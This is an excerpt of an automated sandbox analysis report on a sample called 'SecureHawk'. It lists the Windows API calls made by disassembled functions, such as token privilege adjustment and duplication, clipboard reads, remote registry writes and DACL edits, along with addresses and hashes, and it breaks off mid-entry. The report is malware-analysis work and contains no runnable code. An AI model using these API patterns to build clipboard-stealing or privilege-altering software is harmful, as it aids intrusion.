                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                  • Instruction ID: ab6858522b9103358bd1083b373c80f449f22584607b601dddc9585fb7e68296
                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                  • Instruction Fuzzy Hash: D1B0927A54020CB7CE022A82EC02B897B199B856A8F408021FB1C1D162A6B3A6A09689
                                  APIs
                                    • Part of subcall function 00353E72: FindFirstFileW.KERNEL32(?,?), ref: 00353EE9
                                    • Part of subcall function 00353E72: DeleteFileW.KERNEL32(?,?,?,?), ref: 00353F39
                                    • Part of subcall function 00353E72: FindNextFileW.KERNEL32(00000000,00000010), ref: 00353F4A
                                    • Part of subcall function 00353E72: FindClose.KERNEL32(00000000), ref: 00353F61
                                  • GetLastError.KERNEL32 ref: 0035C0FF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 2191629493-0
                                  • Opcode ID: 2987fbf71f4e00b2c3add809d00d4cdd4ce22a288e35ceb93afafaee610c2223
                                  • Instruction ID: 75c8f39947df1309b5241d6d163349d24a5a19491cf9460fe3b2605b095a14bd
                                  • Opcode Fuzzy Hash: 2987fbf71f4e00b2c3add809d00d4cdd4ce22a288e35ceb93afafaee610c2223
                                  • Instruction Fuzzy Hash: B5F0A7362106048FD715FF59D851F6EB7E4AF84360F058059F9068B352CB74BD01CB90
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0037CF5A
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0037CFB8
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0037CFF9
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0037D023
                                  • SendMessageW.USER32 ref: 0037D04C
                                  • _wcsncpy.LIBCMT ref: 0037D0B8
                                  • GetKeyState.USER32(00000011), ref: 0037D0D9
                                  • GetKeyState.USER32(00000009), ref: 0037D0E6
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0037D0FC
                                  • GetKeyState.USER32(00000010), ref: 0037D106
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0037D12F
                                  • SendMessageW.USER32 ref: 0037D156
                                  • SendMessageW.USER32(?,00001030,?,0037B735), ref: 0037D25A
                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0037D270
                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0037D283
                                  • SetCapture.USER32(?), ref: 0037D28C
                                  • ClientToScreen.USER32(?,?), ref: 0037D2F1
                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0037D2FE
                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0037D318
                                  • ReleaseCapture.USER32 ref: 0037D323
                                  • GetCursorPos.USER32(?), ref: 0037D35D
                                  • ScreenToClient.USER32(?,?), ref: 0037D36A
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0037D3C6
                                  • SendMessageW.USER32 ref: 0037D3F4
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0037D431
                                  • SendMessageW.USER32 ref: 0037D460
                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0037D481
                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0037D490
                                  • GetCursorPos.USER32(?), ref: 0037D4B0
                                  • ScreenToClient.USER32(?,?), ref: 0037D4BD
                                  • GetParent.USER32(?), ref: 0037D4DD
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0037D546
                                  • SendMessageW.USER32 ref: 0037D577
                                  • ClientToScreen.USER32(?,?), ref: 0037D5D5
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0037D605
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0037D62F
                                  • SendMessageW.USER32 ref: 0037D652
                                  • ClientToScreen.USER32(?,?), ref: 0037D6A4
                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0037D6D8
                                    • Part of subcall function 002F29AB: GetWindowLongW.USER32(?,000000EB), ref: 002F29BC
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0037D774
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                  • String ID: @GUI_DRAGID$F$pr;
                                  • API String ID: 3977979337-4188143804
                                  • Opcode ID: b7888b9bc4a7526bb35f2b03a5053318dde15ad1111b669accc615fcce7d2c5f
                                  • Instruction ID: de221a32ac409b17a69aa648f5e34c4b39a63b12faad8b3e78445cb095f54a1f
                                  • Opcode Fuzzy Hash: b7888b9bc4a7526bb35f2b03a5053318dde15ad1111b669accc615fcce7d2c5f
                                  • Instruction Fuzzy Hash: 6C42AD34204341AFDB26CF24C888AAABBF9FF49314F148A5DF65D872A1C735E854CB91
                                  APIs
                                    • Part of subcall function 0034917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003491C6
                                    • Part of subcall function 0034917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003491F3
                                    • Part of subcall function 0034917C: GetLastError.KERNEL32 ref: 00349200
                                  • _memset.LIBCMT ref: 00348D54
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00348DA6
                                  • CloseHandle.KERNEL32(?), ref: 00348DB7
                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00348DCE
                                  • GetProcessWindowStation.USER32 ref: 00348DE7
                                  • SetProcessWindowStation.USER32(00000000), ref: 00348DF1
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00348E0B
                                    • Part of subcall function 00348BCC: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00348D0A), ref: 00348BE1
                                    • Part of subcall function 00348BCC: CloseHandle.KERNEL32(?,?,00348D0A), ref: 00348BF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                  • String ID: $default$winsta0
                                  • API String ID: 2063423040-1027155976
                                  • Opcode ID: 1ffded4cdbfd7f69f0f2e871d48884922947e02bf430221a346434fb14a4141c
                                  • Instruction ID: 20ccec685ecc1d9ddc157f45d52f408e4d5e5fe437739ee9463300fe0783e851
                                  • Opcode Fuzzy Hash: 1ffded4cdbfd7f69f0f2e871d48884922947e02bf430221a346434fb14a4141c
                                  • Instruction Fuzzy Hash: 8B817D71900209AFDF169FA4DC45AEEBBB9FF08304F14419AF911BA161DB31AE59DB20
                                  APIs
                                  • OpenClipboard.USER32(00380980), ref: 00364440
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0036444E
                                  • GetClipboardData.USER32(0000000D), ref: 00364456
                                  • CloseClipboard.USER32 ref: 00364462
                                  • GlobalLock.KERNEL32(00000000), ref: 0036447E
                                  • CloseClipboard.USER32 ref: 00364488
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0036449D
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 003644AA
                                  • GetClipboardData.USER32(00000001), ref: 003644B2
                                  • GlobalLock.KERNEL32(00000000), ref: 003644BF
                                  • GlobalUnlock.KERNEL32(00000000), ref: 003644F3
                                  • CloseClipboard.USER32 ref: 00364603
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                  • String ID:
                                  • API String ID: 3222323430-0
                                  • Opcode ID: 03b5fab45fe4e6bb11136447d22536adbd5f5d7481410c286093095aaf29fd10
                                  • Instruction ID: 22e7acec5c8303588ff6345f757710b7c2511bec55be3cc67e8febe1d3e5fc09
                                  • Opcode Fuzzy Hash: 03b5fab45fe4e6bb11136447d22536adbd5f5d7481410c286093095aaf29fd10
                                  • Instruction Fuzzy Hash: A351AA31244301AFD747EB60DC9AF6E77ACAF84B51F008529F656D61E2EF70D9088B62
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0035CC3D
                                  • FindClose.KERNEL32(00000000), ref: 0035CC91
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0035CCB6
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0035CCCD
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0035CCF4
                                  • __swprintf.LIBCMT ref: 0035CD40
                                  • __swprintf.LIBCMT ref: 0035CD83
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • __swprintf.LIBCMT ref: 0035CDD7
                                    • Part of subcall function 003137FA: __woutput_l.LIBCMT ref: 00313853
                                  • __swprintf.LIBCMT ref: 0035CE25
                                    • Part of subcall function 003137FA: __flsbuf.LIBCMT ref: 00313875
                                    • Part of subcall function 003137FA: __flsbuf.LIBCMT ref: 0031388D
                                  • __swprintf.LIBCMT ref: 0035CE74
                                  • __swprintf.LIBCMT ref: 0035CEC3
                                  • __swprintf.LIBCMT ref: 0035CF12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                  • API String ID: 3953360268-2428617273
                                  • Opcode ID: bf8b80b4f64b4fab13203ee7ac6c759cbce70a1a1ea62faff005f41b3c6cf20c
                                  • Instruction ID: 191407d5dd1cd511748342ce207871040d075d8f4814baef4d002540b41ba63b
                                  • Opcode Fuzzy Hash: bf8b80b4f64b4fab13203ee7ac6c759cbce70a1a1ea62faff005f41b3c6cf20c
                                  • Instruction Fuzzy Hash: E3A13DB1414308AFD315FFA4C996DAFB7ECAF94704F400929F695C6191EB70EA08CB62
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0035F466
                                  • _wcscmp.LIBCMT ref: 0035F47B
                                  • _wcscmp.LIBCMT ref: 0035F492
                                  • GetFileAttributesW.KERNEL32(?), ref: 0035F4A4
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0035F4BE
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0035F4D6
                                  • FindClose.KERNEL32(00000000), ref: 0035F4E1
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0035F4FD
                                  • _wcscmp.LIBCMT ref: 0035F524
                                  • _wcscmp.LIBCMT ref: 0035F53B
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035F54D
                                  • SetCurrentDirectoryW.KERNEL32(003A98F8), ref: 0035F56B
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0035F575
                                  • FindClose.KERNEL32(00000000), ref: 0035F582
                                  • FindClose.KERNEL32(00000000), ref: 0035F594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1803514871-438819550
                                  • Opcode ID: ed85758bec9cdf92c561bf5944f95fa7f29ead58517c70249edbfdca3f8b7317
                                  • Instruction ID: d5d3979ec2bb8795f65677724c5810daa2af9735ef7b0e7856dd193fcaca5832
                                  • Opcode Fuzzy Hash: ed85758bec9cdf92c561bf5944f95fa7f29ead58517c70249edbfdca3f8b7317
                                  • Instruction Fuzzy Hash: E931B2326403196FDB16DFA5DC48EDE73AC9F0A321F1105A6F814E31A0EB74DA488B60
                                  APIs
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00370D7B
                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00380980,00000000,?,00000000,?,?), ref: 00370DE9
                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00370E31
                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00370EBA
                                  • RegCloseKey.ADVAPI32(?), ref: 003711DA
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003711E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Close$ConnectCreateRegistryValue
                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                  • API String ID: 536824911-966354055
                                  • Opcode ID: 84ff8c4afdcc1a43962d46dddf4710a5f094f3cb2b281b7bbd6fd96ed6cb2de1
                                  • Instruction ID: 26cfb5377e9318d256189014fc9320dd97bea6ebf9e154bb085620a7403d2690
                                  • Opcode Fuzzy Hash: 84ff8c4afdcc1a43962d46dddf4710a5f094f3cb2b281b7bbd6fd96ed6cb2de1
                                  • Instruction Fuzzy Hash: 21027C752006059FC726EF28C851E2AB7E5FF89314F04895DF98A9B3A2CB74ED45CB81
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0035F5C3
                                  • _wcscmp.LIBCMT ref: 0035F5D8
                                  • _wcscmp.LIBCMT ref: 0035F5EF
                                    • Part of subcall function 003546E2: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003546FD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0035F61E
                                  • FindClose.KERNEL32(00000000), ref: 0035F629
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0035F645
                                  • _wcscmp.LIBCMT ref: 0035F66C
                                  • _wcscmp.LIBCMT ref: 0035F683
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035F695
                                  • SetCurrentDirectoryW.KERNEL32(003A98F8), ref: 0035F6B3
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0035F6BD
                                  • FindClose.KERNEL32(00000000), ref: 0035F6CA
                                  • FindClose.KERNEL32(00000000), ref: 0035F6DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 1824444939-438819550
                                  • Opcode ID: 0d9189e7f87c743cb0252b1513f1b6ff53e49c7fdc8a0a7176a3adf1fe8d4d14
                                  • Instruction ID: 208118ad58f355399495d1c53f7ad5d5613e05ed14b1d581d31f07da59dbbba2
                                  • Opcode Fuzzy Hash: 0d9189e7f87c743cb0252b1513f1b6ff53e49c7fdc8a0a7176a3adf1fe8d4d14
                                  • Instruction Fuzzy Hash: EE31C5325003196EDB26AFA4DC88EDE77AC9F46325F1105A1EC14A71B0DB71DE8C8B64
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 0035E18C
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0035E19C
                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0035E1A8
                                  • __wsplitpath.LIBCMT ref: 0035E206
                                  • _wcscat.LIBCMT ref: 0035E21E
                                  • _wcscat.LIBCMT ref: 0035E230
                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0035E245
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035E259
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035E28B
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0035E2AC
                                  • _wcscpy.LIBCMT ref: 0035E2B8
                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0035E2F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                  • String ID: *.*
                                  • API String ID: 3566783562-438819550
                                  • Opcode ID: 539b2540473e0f401cc81360b9dec9bba53c907fd2a6397117fb237f33a1e6dd
                                  • Instruction ID: 6732b9debf47069dd0989ba7e92ab53a077eca4cac0c9af288b5691f67466572
                                  • Opcode Fuzzy Hash: 539b2540473e0f401cc81360b9dec9bba53c907fd2a6397117fb237f33a1e6dd
                                  • Instruction Fuzzy Hash: F46148725047059FC715EF60C885DAAB3E8BF89310F04492EF98997261EB31EA49CB92
                                  APIs
                                    • Part of subcall function 00348C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00348C1F
                                    • Part of subcall function 00348C03: GetLastError.KERNEL32(?,003486E3,?,?,?), ref: 00348C29
                                    • Part of subcall function 00348C03: GetProcessHeap.KERNEL32(00000008,?,?,003486E3,?,?,?), ref: 00348C38
                                    • Part of subcall function 00348C03: HeapAlloc.KERNEL32(00000000,?,003486E3,?,?,?), ref: 00348C3F
                                    • Part of subcall function 00348C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00348C56
                                    • Part of subcall function 00348CA0: GetProcessHeap.KERNEL32(00000008,003486F9,00000000,00000000,?,003486F9,?), ref: 00348CAC
                                    • Part of subcall function 00348CA0: HeapAlloc.KERNEL32(00000000,?,003486F9,?), ref: 00348CB3
                                    • Part of subcall function 00348CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003486F9,?), ref: 00348CC4
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00348714
                                  • _memset.LIBCMT ref: 00348729
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00348748
                                  • GetLengthSid.ADVAPI32(?), ref: 00348759
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00348796
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003487B2
                                  • GetLengthSid.ADVAPI32(?), ref: 003487CF
                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003487DE
                                  • HeapAlloc.KERNEL32(00000000), ref: 003487E5
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00348806
                                  • CopySid.ADVAPI32(00000000), ref: 0034880D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0034883E
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00348864
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00348878
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3996160137-0
                                  • Opcode ID: 31ba608eea75d2d78ef28aa4dca31827134274a1d7db35b164bf1bbe1ce3a7e0
                                  • Instruction ID: 199b685dbaed3fac9b9a245eb310c3b637fe064f250a4207fba3dffdee3ede9c
                                  • Opcode Fuzzy Hash: 31ba608eea75d2d78ef28aa4dca31827134274a1d7db35b164bf1bbe1ce3a7e0
                                  • Instruction Fuzzy Hash: 88615EB1900209AFDF46DF94DC84EEEBBB9FF04304F148569F815AB290DB35AA05CB60
                                  APIs
                                    • Part of subcall function 00371242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003701D5,?,?), ref: 00371259
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003708D4
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00370973
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00370A0B
                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00370C4A
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00370C57
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                  • String ID:
                                  • API String ID: 1240663315-0
                                  • Opcode ID: d50717c1c4aa15ecb611afbe291a2a56e616dbcf80d7211da88c3a849c3ac093
                                  • Instruction ID: ff51fa006eb25b4254aeed82ae7c1c42a81350841876b736577b2c794c65ae48
